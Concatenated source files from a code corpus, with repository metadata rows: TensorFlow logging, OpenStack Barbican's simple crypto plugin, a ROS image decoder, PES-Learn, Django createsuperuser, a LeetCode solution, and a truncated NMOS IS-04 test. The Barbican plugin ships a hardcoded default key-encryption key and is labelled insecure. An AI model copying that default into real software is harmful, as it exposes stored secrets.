grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
train_loss(loss)
train_accuracy(y_train, predictions)
def test_step(model, x_test, y_test):
predictions = model(x_test)
loss = loss_object(y_test, predictions)
test_loss(loss)
test_accuracy(y_test, predictions)
# Set up summary writers to write the summaries to disk in separate log directories for training and test:
current_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
train_log_dir = 'logs/gradient_tape/' + current_time + '/train'
test_log_dir = 'logs/gradient_tape/' + current_time + '/test'
train_summary_writer = tf.summary.create_file_writer(train_log_dir)
test_summary_writer = tf.summary.create_file_writer(test_log_dir)
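# Added note: once a few epochs have been logged, the scalars can be inspected by running
# `tensorboard --logdir logs/gradient_tape` against the same top-level directory used above.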
model = create_model() # reset our model
EPOCHS = 5
for epoch in range(EPOCHS):
for (x_train, y_train) in train_dataset:
train_step(model, optimizer, x_train, y_train)
with train_summary_writer.as_default():
tf.summary.scalar('loss', train_loss.result(), step=epoch)
tf.summary.scalar('accuracy', train_accuracy.result(), step=epoch)
for (x_test, y_test) in test_dataset:
test_step(model, x_test, y_test)
with test_summary_writer.as_default():
tf.summary.scalar('loss', test_loss.result(), step=epoch)
tf.summary.scalar('accuracy', test_accuracy.result(), step=epoch)
template = 'Epoch {}, Loss: {}, Accuracy: {}, Test Loss: {}, Test Accuracy: {}'
print(template.format(epoch + 1,
train_loss.result(),
train_accuracy.result() * 100,
test_loss.result(),
test_accuracy.result() * 100))
# Reset metrics every epoch
train_loss.reset_states()
test_loss.reset_states()
train_accuracy.reset_states()
test_accuracy.reset_states()
| 35.65625 | 118 | 0.722466 |
f1c255bab67aae84eecfe1d2afc1875ccb6ef0dd
| 9,389 |
py
|
Python
|
barbican/plugin/crypto/simple_crypto.py
|
mail2nsrajesh/barbican
|
d16d932b77486e9b2f8c6d30e628a6e66517b1a6
|
[
"Apache-2.0"
] | null | null | null |
barbican/plugin/crypto/simple_crypto.py
|
mail2nsrajesh/barbican
|
d16d932b77486e9b2f8c6d30e628a6e66517b1a6
|
[
"Apache-2.0"
] | null | null | null |
barbican/plugin/crypto/simple_crypto.py
|
mail2nsrajesh/barbican
|
d16d932b77486e9b2f8c6d30e628a6e66517b1a6
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from cryptography import fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from oslo_config import cfg
from oslo_utils import encodeutils
import six
from barbican.common import config
from barbican.common import utils
from barbican import i18n as u
from barbican.plugin.crypto import base as c
CONF = config.new_config()
LOG = utils.getLogger(__name__)
simple_crypto_plugin_group = cfg.OptGroup(name='simple_crypto_plugin',
title="Simple Crypto Plugin Options")
simple_crypto_plugin_opts = [
cfg.StrOpt('kek',
default='dGhpcnR5X3R3b19ieXRlX2tleWJsYWhibGFoYmxhaGg=',
help=u._('Key encryption key to be used by Simple Crypto '
'Plugin'), secret=True),
cfg.StrOpt('plugin_name',
help=u._('User friendly plugin name'),
default='Software Only Crypto'),
]
CONF.register_group(simple_crypto_plugin_group)
CONF.register_opts(simple_crypto_plugin_opts, group=simple_crypto_plugin_group)
config.parse_args(CONF)
def list_opts():
yield simple_crypto_plugin_group, simple_crypto_plugin_opts
class SimpleCryptoPlugin(c.CryptoPluginBase):
"""Insecure implementation of the crypto plugin."""
def __init__(self, conf=CONF):
self.master_kek = conf.simple_crypto_plugin.kek
self.plugin_name = conf.simple_crypto_plugin.plugin_name
LOG.warning("This plugin is NOT meant for a production "
"environment. This is meant just for development "
"and testing purposes. Please use another plugin "
"for production.")
def get_plugin_name(self):
return self.plugin_name
def _get_kek(self, kek_meta_dto):
if not kek_meta_dto.plugin_meta:
raise ValueError(u._('KEK not yet created.'))
# the kek is stored encrypted. Need to decrypt.
encryptor = fernet.Fernet(self.master_kek)
# Note : If plugin_meta type is unicode, encode to byte.
if isinstance(kek_meta_dto.plugin_meta, six.text_type):
kek_meta_dto.plugin_meta = kek_meta_dto.plugin_meta.encode('utf-8')
return encryptor.decrypt(kek_meta_dto.plugin_meta)
def encrypt(self, encrypt_dto, kek_meta_dto, project_id):
kek = self._get_kek(kek_meta_dto)
unencrypted = encrypt_dto.unencrypted
if not isinstance(unencrypted, six.binary_type):
raise ValueError(
u._(
'Unencrypted data must be a byte type, but was '
'{unencrypted_type}'
).format(
unencrypted_type=type(unencrypted)
)
)
encryptor = fernet.Fernet(kek)
cyphertext = encryptor.encrypt(unencrypted)
return c.ResponseDTO(cyphertext, None)
def decrypt(self, encrypted_dto, kek_meta_dto, kek_meta_extended,
project_id):
kek = self._get_kek(kek_meta_dto)
encrypted = encrypted_dto.encrypted
decryptor = fernet.Fernet(kek)
return decryptor.decrypt(encrypted)
def bind_kek_metadata(self, kek_meta_dto):
kek_meta_dto.algorithm = 'aes'
kek_meta_dto.bit_length = 128
kek_meta_dto.mode = 'cbc'
if not kek_meta_dto.plugin_meta:
# the kek is stored encrypted in the plugin_meta field
encryptor = fernet.Fernet(self.master_kek)
key = fernet.Fernet.generate_key()
kek_meta_dto.plugin_meta = encryptor.encrypt(key)
return kek_meta_dto
def generate_symmetric(self, generate_dto, kek_meta_dto, project_id):
byte_length = int(generate_dto.bit_length) // 8
unencrypted = os.urandom(byte_length)
return self.encrypt(c.EncryptDTO(unencrypted),
kek_meta_dto,
project_id)
def generate_asymmetric(self, generate_dto, kek_meta_dto, project_id):
"""Generate asymmetric keys based on below rules:
- RSA, with passphrase (supported)
- RSA, without passphrase (supported)
- DSA, without passphrase (supported)
- DSA, with passphrase (supported)
"""
if(generate_dto.algorithm is None or generate_dto
.algorithm.lower() == 'rsa'):
private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=generate_dto.bit_length,
backend=default_backend()
)
elif generate_dto.algorithm.lower() == 'dsa':
private_key = dsa.generate_private_key(
key_size=generate_dto.bit_length,
backend=default_backend()
)
else:
raise c.CryptoPrivateKeyFailureException()
public_key = private_key.public_key()
if generate_dto.algorithm.lower() == 'rsa':
private_key = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=self._get_encryption_algorithm(
generate_dto.passphrase)
)
public_key = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
if generate_dto.algorithm.lower() == 'dsa':
private_key = private_key.private_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=self._get_encryption_algorithm(
generate_dto.passphrase)
)
public_key = public_key.public_bytes(
encoding=serialization.Encoding.DER,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
private_dto = self.encrypt(c.EncryptDTO(private_key),
kek_meta_dto,
project_id)
public_dto = self.encrypt(c.EncryptDTO(public_key),
kek_meta_dto,
project_id)
passphrase_dto = None
if generate_dto.passphrase:
if isinstance(generate_dto.passphrase, six.text_type):
generate_dto.passphrase = generate_dto.passphrase.encode(
'utf-8')
passphrase_dto = self.encrypt(c.EncryptDTO(generate_dto.
passphrase),
kek_meta_dto,
project_id)
return private_dto, public_dto, passphrase_dto
def supports(self, type_enum, algorithm=None, bit_length=None,
mode=None):
if type_enum == c.PluginSupportTypes.ENCRYPT_DECRYPT:
return True
if type_enum == c.PluginSupportTypes.SYMMETRIC_KEY_GENERATION:
return self._is_algorithm_supported(algorithm,
bit_length)
elif type_enum == c.PluginSupportTypes.ASYMMETRIC_KEY_GENERATION:
return self._is_algorithm_supported(algorithm,
bit_length)
else:
return False
def _get_encryption_algorithm(self, passphrase):
"""Choose whether to use encryption or not based on passphrase
serialization.BestAvailableEncryption fails if passphrase is not
given or if less than one byte therefore we need to check if it is
valid or not
"""
if passphrase:
# encryption requires password in bytes format
algorithm = serialization.BestAvailableEncryption(
# default encoding is utf-8
encodeutils.safe_encode(passphrase)
)
else:
algorithm = serialization.NoEncryption()
return algorithm
def _is_algorithm_supported(self, algorithm=None, bit_length=None):
"""check if algorithm and bit_length combination is supported."""
if algorithm is None or bit_length is None:
return False
if (algorithm.lower() in
c.PluginSupportTypes.SYMMETRIC_ALGORITHMS and bit_length in
c.PluginSupportTypes.SYMMETRIC_KEY_LENGTHS):
return True
elif (algorithm.lower() in c.PluginSupportTypes.ASYMMETRIC_ALGORITHMS
and bit_length in c.PluginSupportTypes.ASYMMETRIC_KEY_LENGTHS):
return True
else:
return False
| 39.616034 | 79 | 0.629673 |
78204928e9e7ba0f0a1c584af1a758b0f0120aa1
| 2,413 |
py
|
Python
|
src/decoder_node.py
|
TienPoly/VO_duckiebot
|
b1ea4a7656d9d8e580f64584eb831e15b825a19c
|
[
"BSD-3-Clause"
] | null | null | null |
src/decoder_node.py
|
TienPoly/VO_duckiebot
|
b1ea4a7656d9d8e580f64584eb831e15b825a19c
|
[
"BSD-3-Clause"
] | null | null | null |
src/decoder_node.py
|
TienPoly/VO_duckiebot
|
b1ea4a7656d9d8e580f64584eb831e15b825a19c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import rospy
from cv_bridge import CvBridge, CvBridgeError
import cv2
import numpy as np
from sensor_msgs.msg import CompressedImage,Image
#from duckietown_msgs.msg import BoolStamped
class DecoderNode(object):
def __init__(self):
self.node_name = rospy.get_name()
self.active = True
self.bridge = CvBridge()
self.publish_freq = self.setupParam("~publish_freq", 30.0)
self.publish_duration = rospy.Duration.from_sec(1.0/self.publish_freq)
self.pub_raw = rospy.Publisher("~image/raw",Image,queue_size=1)
self.pub_compressed = rospy.Publisher("~image/compressed", CompressedImage, queue_size=1)
self.last_stamp = rospy.Time.now()
self.sub_compressed_img = rospy.Subscriber("~compressed_image",CompressedImage,self.cbImg,queue_size=1)
#self.sub_switch = rospy.Subscriber("~switch",BoolStamped, self.cbSwitch, queue_size=1)
def setupParam(self,param_name,default_value):
value = rospy.get_param(param_name,default_value)
rospy.set_param(param_name,value) #Write to parameter server for transparency
rospy.loginfo("[%s] %s = %s " %(self.node_name,param_name,value))
return value
#def cbSwitch(self,switch_msg):
# self.active = switch_msg.data
def cbImg(self,msg):
if not self.active:
return
now = rospy.Time.now()
if now - self.last_stamp < self.publish_duration:
return
else:
self.last_stamp = now
# time_start = time.time()
np_arr = np.frombuffer(msg.data, np.uint8)
cv_image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
# time_1 = time.time()
img_msg = self.bridge.cv2_to_imgmsg(cv_image, "bgr8")
# time_2 = time.time()
img_msg.header.stamp = msg.header.stamp
img_msg.header.frame_id = msg.header.frame_id
self.pub_raw.publish(img_msg)
self.pub_compressed.publish(msg)
# time_3 = time.time()
# rospy.loginfo("[%s] Took %f sec to decompress."%(self.node_name,time_1 - time_start))
# rospy.loginfo("[%s] Took %f sec to conver to Image."%(self.node_name,time_2 - time_1))
# rospy.loginfo("[%s] Took %f sec to publish."%(self.node_name,time_3 - time_2))
if __name__ == '__main__':
rospy.init_node('decoder_low_freq',anonymous=False)
node = DecoderNode()
rospy.spin()
| 40.216667 | 111 | 0.665562 |
cb834d19f8cfdb7293a2595f88dfa764bc30d95f
| 3,069 |
py
|
Python
|
1_Tutorials/1_water_pes_api/model5_data/compute_energy.py
|
zero0911/PES-Learn
|
7a956db1aff368f978dd3c5c08ef99aec2613d53
|
[
"BSD-3-Clause"
] | 2 |
2020-11-02T07:23:14.000Z
|
2020-11-05T10:21:59.000Z
|
1_Tutorials/1_water_pes_api/model5_data/compute_energy.py
|
zero0911/PES-Learn
|
7a956db1aff368f978dd3c5c08ef99aec2613d53
|
[
"BSD-3-Clause"
] | null | null | null |
1_Tutorials/1_water_pes_api/model5_data/compute_energy.py
|
zero0911/PES-Learn
|
7a956db1aff368f978dd3c5c08ef99aec2613d53
|
[
"BSD-3-Clause"
] | null | null | null |
from peslearn.ml import NeuralNetwork
from peslearn import InputProcessor
import torch
import numpy as np
from itertools import combinations
nn = NeuralNetwork('PES.dat', InputProcessor(''), molecule_type='A2B')
params = {'layers': (16,), 'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': {'activation': 'tanh', 'scale_X': 'std'}, 'scale_y': 'mm11', 'lr': 0.5}
X, y, Xscaler, yscaler = nn.preprocess(params, nn.raw_X, nn.raw_y)
model = torch.load('model.pt')
# How to use the 'pes()' energy function defined below
# -----------------------------------------------------
# E = pes(geom_vectors, cartesian=bool)
# 'geom_vectors' is either:
# 1. A list or tuple of coordinates for a single geometry.
# 2. A column vector of one or more sets of 1d coordinate vectors as a list of lists or 2D NumPy array:
# [[ coord1, coord2, ..., coordn],
# [ coord1, coord2, ..., coordn],
# : : : ],
# [ coord1, coord2, ..., coordn]]
# In all cases, coordinates should be supplied in the exact same format and exact same order the model was trained on.
# If the coordinates format used to train the model was interatomic distances, each set of coordinates should be a 1d array of either interatom distances or cartesian coordinates.
# If cartesian coordinates are supplied, cartesian=True should be passed and it will convert them to interatomic distances.
# The order of coordinates matters. If PES-Learn datasets were used they should be in standard order;
# i.e. cartesians should be supplied in the order x,y,z of most common atoms first, with alphabetical tiebreaker.
# e.g., C2H3O2 --> H1x H1y H1z H2x H2y H2z H3x H3y H3z C1x C1y C1z C2x C2y C2z O1x O1y O1z O2x O2y O2z
# and interatom distances should be the row-wise order of the lower triangle of the interatom distance matrix, with standard order atom axes:
# H H H C C O O
# H
# H 1
# H 2 3
# C 4 5 6
# C 7 8 9 10
# O 11 12 13 14 15
# O 16 17 18 19 20 21
# The returned energy array is a column vector of corresponding energies. Elements can be accessed with E[0,0], E[0,1], E[0,2]
# NOTE: Sending multiple geometries through at once is much faster than a loop of sending single geometries through.
def pes(geom_vectors, cartesian=True):
g = np.asarray(geom_vectors)
if cartesian:
axis = 1
if len(g.shape) < 2:
axis = 0
g = np.apply_along_axis(cart1d_to_distances1d, axis, g)
newX = nn.transform_new_X(g, params, Xscaler)
x = torch.tensor(data=newX)
with torch.no_grad():
E = model(x)
e = nn.inverse_transform_new_y(E, yscaler)
#e = e - (insert min energy here)
#e *= 219474.63 ( convert units )
return e
def cart1d_to_distances1d(vec):
vec = vec.reshape(-1,3)
n = len(vec)
distance_matrix = np.zeros((n,n))
for i,j in combinations(range(len(vec)),2):
R = np.linalg.norm(vec[i]-vec[j])
distance_matrix[j,i] = R
distance_vector = distance_matrix[np.tril_indices(len(distance_matrix),-1)]
return distance_vector
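# Hedged usage sketch (added; the geometry values below are illustrative, not taken from
# the training data). Cartesians are supplied in the dataset's A2B atom order for water,
# i.e. H, H, O, one flattened x,y,z row per geometry.
if __name__ == "__main__":
    example_geoms = np.array([
        [0.0, 0.757, 0.587,    # H1 x, y, z (units assumed to match the training data)
         0.0, -0.757, 0.587,   # H2 x, y, z
         0.0, 0.0, 0.0],       # O  x, y, z
    ])
    print(pes(example_geoms, cartesian=True))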
| 45.132353 | 195 | 0.677419 |
0537fb9a5bd7baac9ceb7be117af0d7776052385
| 7,629 |
py
|
Python
|
env/lib/python2.7/site-packages/django/contrib/auth/management/commands/createsuperuser.py
|
diego-d5000/MisValesMd
|
b641782bc2546776e9f55f452ec7fb48100dc482
|
[
"MIT"
] | null | null | null |
env/lib/python2.7/site-packages/django/contrib/auth/management/commands/createsuperuser.py
|
diego-d5000/MisValesMd
|
b641782bc2546776e9f55f452ec7fb48100dc482
|
[
"MIT"
] | null | null | null |
env/lib/python2.7/site-packages/django/contrib/auth/management/commands/createsuperuser.py
|
diego-d5000/MisValesMd
|
b641782bc2546776e9f55f452ec7fb48100dc482
|
[
"MIT"
] | null | null | null |
"""
Management utility to create superusers.
"""
from __future__ import unicode_literals
import getpass
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.management import get_default_username
from django.core import exceptions
from django.core.management.base import BaseCommand, CommandError
from django.db import DEFAULT_DB_ALIAS
from django.utils.encoding import force_str
from django.utils.six.moves import input
from django.utils.text import capfirst
class NotRunningInTTYException(Exception):
pass
class Command(BaseCommand):
help = 'Used to create a superuser.'
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.UserModel = get_user_model()
self.username_field = self.UserModel._meta.get_field(self.UserModel.USERNAME_FIELD)
def add_arguments(self, parser):
parser.add_argument('--%s' % self.UserModel.USERNAME_FIELD,
dest=self.UserModel.USERNAME_FIELD, default=None,
help='Specifies the login for the superuser.')
parser.add_argument('--noinput', action='store_false', dest='interactive', default=True,
help=('Tells Django to NOT prompt the user for input of any kind. '
'You must use --%s with --noinput, along with an option for '
'any other required field. Superusers created with --noinput will '
'not be able to log in until they\'re given a valid password.' %
self.UserModel.USERNAME_FIELD))
parser.add_argument('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS,
help='Specifies the database to use. Default is "default".')
for field in self.UserModel.REQUIRED_FIELDS:
parser.add_argument('--%s' % field, dest=field, default=None,
help='Specifies the %s for the superuser.' % field)
def execute(self, *args, **options):
self.stdin = options.get('stdin', sys.stdin) # Used for testing
return super(Command, self).execute(*args, **options)
def handle(self, *args, **options):
username = options.get(self.UserModel.USERNAME_FIELD, None)
database = options.get('database')
# If not provided, create the user with an unusable password
password = None
user_data = {}
# Do quick and dirty validation if --noinput
if not options['interactive']:
try:
if not username:
raise CommandError("You must use --%s with --noinput." %
self.UserModel.USERNAME_FIELD)
username = self.username_field.clean(username, None)
for field_name in self.UserModel.REQUIRED_FIELDS:
if options.get(field_name):
field = self.UserModel._meta.get_field(field_name)
user_data[field_name] = field.clean(options[field_name], None)
else:
raise CommandError("You must use --%s with --noinput." % field_name)
except exceptions.ValidationError as e:
raise CommandError('; '.join(e.messages))
else:
# Prompt for username/password, and any other required fields.
# Enclose this whole thing in a try/except to catch
# KeyboardInterrupt and exit gracefully.
default_username = get_default_username()
try:
if hasattr(self.stdin, 'isatty') and not self.stdin.isatty():
raise NotRunningInTTYException("Not running in a TTY")
# Get a username
verbose_field_name = self.username_field.verbose_name
while username is None:
input_msg = capfirst(verbose_field_name)
if default_username:
input_msg += " (leave blank to use '%s')" % default_username
username_rel = self.username_field.rel
input_msg = force_str('%s%s: ' % (
input_msg,
' (%s.%s)' % (
username_rel.to._meta.object_name,
username_rel.field_name
) if username_rel else '')
)
username = self.get_input_data(self.username_field, input_msg, default_username)
if not username:
continue
try:
self.UserModel._default_manager.db_manager(database).get_by_natural_key(username)
except self.UserModel.DoesNotExist:
pass
else:
self.stderr.write("Error: That %s is already taken." %
verbose_field_name)
username = None
for field_name in self.UserModel.REQUIRED_FIELDS:
field = self.UserModel._meta.get_field(field_name)
user_data[field_name] = options.get(field_name)
while user_data[field_name] is None:
message = force_str('%s%s: ' % (capfirst(field.verbose_name),
' (%s.%s)' % (field.rel.to._meta.object_name, field.rel.field_name) if field.rel else ''))
user_data[field_name] = self.get_input_data(field, message)
# Get a password
while password is None:
if not password:
password = getpass.getpass()
password2 = getpass.getpass(force_str('Password (again): '))
if password != password2:
self.stderr.write("Error: Your passwords didn't match.")
password = None
continue
if password.strip() == '':
self.stderr.write("Error: Blank passwords aren't allowed.")
password = None
continue
except KeyboardInterrupt:
self.stderr.write("\nOperation cancelled.")
sys.exit(1)
except NotRunningInTTYException:
self.stdout.write(
"Superuser creation skipped due to not running in a TTY. "
"You can run `manage.py createsuperuser` in your project "
"to create one manually."
)
if username:
user_data[self.UserModel.USERNAME_FIELD] = username
user_data['password'] = password
self.UserModel._default_manager.db_manager(database).create_superuser(**user_data)
if options['verbosity'] >= 1:
self.stdout.write("Superuser created successfully.")
def get_input_data(self, field, message, default=None):
"""
Override this method if you want to customize data inputs or
validation exceptions.
"""
raw_value = input(message)
if default and raw_value == '':
raw_value = default
try:
val = field.clean(raw_value, None)
except exceptions.ValidationError as e:
self.stderr.write("Error: %s" % '; '.join(e.messages))
val = None
return val
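    # Usage sketch (added for illustration, not part of the original command): with
    # the --noinput branch in handle() above, a superuser can be created
    # non-interactively as long as the username field and every REQUIRED_FIELDS
    # value are supplied, e.g. (field names below are the common defaults and may
    # differ for a custom user model):
    #
    #   python manage.py createsuperuser --noinput --username admin --email admin@example.com
    #
    # In that case the password is left unusable, matching the comment near the top
    # of handle(); it can be set afterwards with `manage.py changepassword`.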
| 45.410714 | 119 | 0.551579 |
45cdcf84514e3ad3bde02684e5ebd9629f548833
| 1,326 |
py
|
Python
|
LeetCode/daily/1395.统计作战单位数.py
|
xmmmmmovo/MyAlgorithmSolutions
|
f5198d438f36f41cc4f72d53bb71d474365fa80d
|
[
"MIT"
] | 1 |
2020-03-26T13:40:52.000Z
|
2020-03-26T13:40:52.000Z
|
LeetCode/daily/1395.统计作战单位数.py
|
xmmmmmovo/MyAlgorithmSolutions
|
f5198d438f36f41cc4f72d53bb71d474365fa80d
|
[
"MIT"
] | null | null | null |
LeetCode/daily/1395.统计作战单位数.py
|
xmmmmmovo/MyAlgorithmSolutions
|
f5198d438f36f41cc4f72d53bb71d474365fa80d
|
[
"MIT"
] | null | null | null |
from typing import List
class Solution:
def numTeams(self, rating: List[int]) -> int:
res = 0
for i in range(len(rating) - 2):
for j in range(i+1, len(rating)-1):
for k in range(j+1, len(rating)):
if (rating[i] < rating[j] and rating[j] < rating[k]) or (rating[i] > rating[j] and rating[j] > rating[k]):
res += 1
return res
class Solution2:
def numTeams(self, rating: List[int]) -> int:
"""
        The overall idea: iterate over every index and count the combinations in which it can serve as the middle soldier of a team.
"""
if len(rating) < 3:
return 0
res = 0
for j in range(len(rating) - 1):
scl = 0
scr = 0
bcl = 0
bcr = 0
for i in range(j):
if(rating[i] < rating[j]):
scl += 1
else:
bcl += 1
for k in range(j+1, len(rating)):
if(rating[k] < rating[j]):
scr += 1
else:
bcr += 1
            res += scl * bcr + bcl * scr  # smaller-left/bigger-right plus bigger-left/smaller-right
return res
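# Editorial note (added for clarity, not in the original solution): for each middle
# index j, scl/bcl count smaller/bigger ratings to its left and scr/bcr count
# smaller/bigger ratings to its right, so scl * bcr counts ascending teams and
# bcl * scr counts descending teams through j. This reduces the brute-force O(n^3)
# triple loop of Solution to O(n^2). For example, with [2, 5, 3, 4, 1] and j = 2
# (rating 3): scl = 1, bcl = 1, scr = 1, bcr = 1, contributing 1*1 + 1*1 = 2 teams.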
if __name__ == "__main__":
assert Solution2().numTeams([2, 5, 3, 4, 1]) == 3
assert Solution2().numTeams([2, 1, 3]) == 0
assert Solution2().numTeams([1, 2, 3, 4]) == 4
| 26 | 126 | 0.430618 |
dd891e183ca73404e6d211c901431159f14c9743
| 76,171 |
py
|
Python
|
nmostesting/suites/IS0401Test.py
|
maweit/nmos-testing
|
6d2a8337234038fd8b27a593d35f1e0d6cc95fed
|
[
"Apache-2.0"
] | null | null | null |
nmostesting/suites/IS0401Test.py
|
maweit/nmos-testing
|
6d2a8337234038fd8b27a593d35f1e0d6cc95fed
|
[
"Apache-2.0"
] | null | null | null |
nmostesting/suites/IS0401Test.py
|
maweit/nmos-testing
|
6d2a8337234038fd8b27a593d35f1e0d6cc95fed
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2018 Riedel Communications GmbH & Co. KG
#
# Modifications Copyright 2018 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import socket
from requests.compat import json
from urllib.parse import urlparse
from dnslib import QTYPE
from copy import deepcopy
from zeroconf_monkey import ServiceBrowser, ServiceInfo, Zeroconf
from .. import Config as CONFIG
from ..MdnsListener import MdnsListener
from ..GenericTest import GenericTest, NMOSTestException, NMOS_WIKI_URL
from ..IS04Utils import IS04Utils
from ..TestHelper import get_default_ip
NODE_API_KEY = "node"
class IS0401Test(GenericTest):
"""
Runs IS-04-01-Test
"""
def __init__(self, apis, registries, node, dns_server):
GenericTest.__init__(self, apis)
self.invalid_registry = registries[0]
self.primary_registry = registries[1]
self.registries = registries[1:]
self.node = node
self.dns_server = dns_server
self.node_url = self.apis[NODE_API_KEY]["url"]
self.registry_basics_done = False
self.registry_basics_data = []
self.registry_primary_data = None
self.registry_invalid_data = None
self.node_basics_data = {
"self": None, "devices": None, "sources": None,
"flows": None, "senders": None, "receivers": None
}
self.is04_utils = IS04Utils(self.node_url)
self.zc = None
self.zc_listener = None
def set_up_tests(self):
self.zc = Zeroconf()
self.zc_listener = MdnsListener(self.zc)
if self.dns_server:
self.dns_server.load_zone(self.apis[NODE_API_KEY]["version"], self.protocol)
print(" * Waiting for up to {} seconds for a DNS query before executing tests"
.format(CONFIG.DNS_SD_ADVERT_TIMEOUT))
self.dns_server.wait_for_query(
QTYPE.PTR,
[
"_nmos-register._tcp.{}.".format(CONFIG.DNS_DOMAIN),
"_nmos-registration._tcp.{}.".format(CONFIG.DNS_DOMAIN)
],
CONFIG.DNS_SD_ADVERT_TIMEOUT
)
def tear_down_tests(self):
if self.zc:
self.zc.close()
self.zc = None
if self.dns_server:
self.dns_server.reset()
def _registry_mdns_info(self, port, priority=0, api_ver=None, api_proto=None, ip=None):
"""Get an mDNS ServiceInfo object in order to create an advertisement"""
if api_ver is None:
api_ver = self.apis[NODE_API_KEY]["version"]
if api_proto is None:
api_proto = self.protocol
if ip is None:
ip = get_default_ip()
hostname = "nmos-mocks.local."
else:
hostname = ip.replace(".", "-") + ".local."
# TODO: Add another test which checks support for parsing CSV string in api_ver
txt = {'api_ver': api_ver, 'api_proto': api_proto, 'pri': str(priority), 'api_auth': 'false'}
service_type = "_nmos-registration._tcp.local."
if self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.3") >= 0:
service_type = "_nmos-register._tcp.local."
info = ServiceInfo(service_type,
"NMOSTestSuite{}{}.{}".format(port, api_proto, service_type),
socket.inet_aton(ip), port, 0, 0,
txt, hostname)
return info
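    # Illustrative sketch (not part of the original suite): the ServiceInfo built
    # above advertises DNS-SD TXT records roughly like
    #   {'api_ver': 'v1.3', 'api_proto': 'http', 'pri': '0', 'api_auth': 'false'}
    # under _nmos-register._tcp (v1.3+) or _nmos-registration._tcp (earlier
    # versions); the actual api_ver value tracks the Node API version under test.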
def do_node_basics_prereqs(self):
"""Collect a copy of each of the Node's resources"""
for resource in self.node_basics_data:
url = "{}{}".format(self.node_url, resource)
valid, r = self.do_request("GET", url)
if valid and r.status_code == 200:
try:
self.node_basics_data[resource] = r.json()
except Exception:
pass
def do_registry_basics_prereqs(self):
"""Advertise a registry and collect data from any Nodes which discover it"""
if self.registry_basics_done:
return
if not CONFIG.ENABLE_DNS_SD:
self.do_node_basics_prereqs()
return
if CONFIG.DNS_SD_MODE == "multicast":
registry_mdns = []
priority = 0
# Add advertisement with invalid version
info = self._registry_mdns_info(self.invalid_registry.get_data().port, priority, "v9.0")
registry_mdns.append(info)
# Add advertisement with invalid protocol
info = self._registry_mdns_info(self.invalid_registry.get_data().port, priority, None, "invalid")
registry_mdns.append(info)
# Add advertisement for primary and failover registries
for registry in self.registries[0:-1]:
info = self._registry_mdns_info(registry.get_data().port, priority)
registry_mdns.append(info)
priority += 10
# Add a fake advertisement for a timeout simulating registry
info = self._registry_mdns_info(444, priority, ip="192.0.2.1")
registry_mdns.append(info)
priority += 10
# Add the final real registry advertisement
info = self._registry_mdns_info(self.registries[-1].get_data().port, priority)
registry_mdns.append(info)
# Reset all registries to clear previous heartbeats, etc.
self.invalid_registry.reset()
for registry in self.registries:
registry.reset()
self.invalid_registry.enable()
self.primary_registry.enable()
if CONFIG.DNS_SD_MODE == "multicast":
# Advertise the primary registry and invalid ones at pri 0, and allow the Node to do a basic registration
if self.is04_utils.compare_api_version(self.apis[NODE_API_KEY]["version"], "v1.0") != 0:
self.zc.register_service(registry_mdns[0])
self.zc.register_service(registry_mdns[1])
self.zc.register_service(registry_mdns[2])
# Wait for n seconds after advertising the service for the first POST from a Node
start_time = time.time()
while time.time() < start_time + CONFIG.DNS_SD_ADVERT_TIMEOUT:
if self.primary_registry.has_registrations():
break
if self.invalid_registry.has_registrations():
break
time.sleep(0.2)
# Wait until we're sure the Node has registered everything it intends to, and we've had at least one heartbeat
while (time.time() - self.primary_registry.last_time) < CONFIG.HEARTBEAT_INTERVAL + 1 or \
(time.time() - self.invalid_registry.last_time) < CONFIG.HEARTBEAT_INTERVAL + 1:
time.sleep(0.2)
# Collect matching resources from the Node
self.do_node_basics_prereqs()
# Ensure we have two heartbeats from the Node, assuming any are arriving (for test_05)
if len(self.primary_registry.get_data().heartbeats) > 0 or len(self.invalid_registry.get_data().heartbeats) > 0:
# It is heartbeating, but we don't have enough of them yet
while len(self.primary_registry.get_data().heartbeats) < 2 and \
len(self.invalid_registry.get_data().heartbeats) < 2:
time.sleep(0.2)
# Once registered, advertise all other registries at different (ascending) priorities
for index, registry in enumerate(self.registries[1:]):
registry.enable()
if CONFIG.DNS_SD_MODE == "multicast":
for info in registry_mdns[3:]:
self.zc.register_service(info)
# Kill registries one by one to collect data around failover
self.invalid_registry.disable()
for index, registry in enumerate(self.registries):
registry.disable()
# Prevent access to an out of bounds index below
if (index + 1) >= len(self.registries):
break
            # in the event of testing HTTPS support, the TLS handshake seems to take nearly 2 seconds, so
